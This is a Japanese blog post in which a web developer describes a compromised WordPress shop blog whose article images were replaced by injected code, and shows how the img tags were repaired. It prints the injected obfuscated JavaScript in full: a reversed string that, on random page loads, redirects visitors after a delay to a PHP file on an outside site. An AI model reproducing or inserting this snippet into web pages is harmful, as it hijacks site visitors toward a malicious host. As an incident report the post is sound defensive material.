WordPressで写真が表示されなくなるトラブルが発生した。数年前にエルデで受注し、2,000ページぐらいある記事を移してリニューアルした某オンラインショップのブログ。保守運営はショップがやっていたが、ピンポイントで対策を頼まれた。
日曜日ぐらいから過去記事全ての写真が表示されなくなり,写真のあるべきところが
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} class=”aligncenter size-full wp-image-69159″ src=”https://hogehoge/blog/wp-content/uploads/2022/01/P1132134.jpg” alt=”” width=”640″ height=”480″ />
といった文字列に置き換えられている。
エディタで見ると
<img<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script> class="alignnone size-full wp-image-68674" src="https://hogehoge/blog/wp-content/uploads/2021/12/PC019385.jpg" alt="" width="640" height="480" />
のように「<」が「<」に,「>」が「>」に置き換えられている記事もある。
<img class="alignnone size-full wp-image-68674" src="https://xn--18ja5jb.jp/.../uploads/2021/12/PC019385.jpg" alt="" width="640" height="480" />
に修正すれば写真が表示される。
アタックされたのだろうか。